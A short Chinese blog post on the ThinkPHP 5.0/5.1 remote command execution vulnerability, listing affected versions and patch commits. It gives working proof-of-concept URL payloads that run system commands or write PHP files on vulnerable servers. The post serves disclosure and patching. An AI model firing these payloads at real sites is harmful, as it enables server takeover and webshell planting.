康哥blog

康哥学网

ThinkPHP v5.x命令执行漏洞

漏洞影响

版本: Thinkphp v5.1.29(影响版本<5.1.31和<5.0.23)

相关注明

漏洞分析仅用于学习!!!一切实际攻击利用行为概不负责。

漏洞修复

Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

漏洞构造

5.0版本POC(不唯一)

命令执行:public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令
文件写入:public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=mracat.php&vars[1][1]=<?php phpinfo();?>

5.1版本POC(不唯一)

命令执行:public/index.php?s=index/\think\Request/input&filter=system&data=系统命令
文件写入:public/index.php?s=index/\think\template\driver\file/write&cacheFile=mracat.php&content=<?php phpinfo();?>

发表评论:

Powered By Z-BlogPHP 1.6.0 Valyria

康哥工作室 鲁ICP备15037495号-1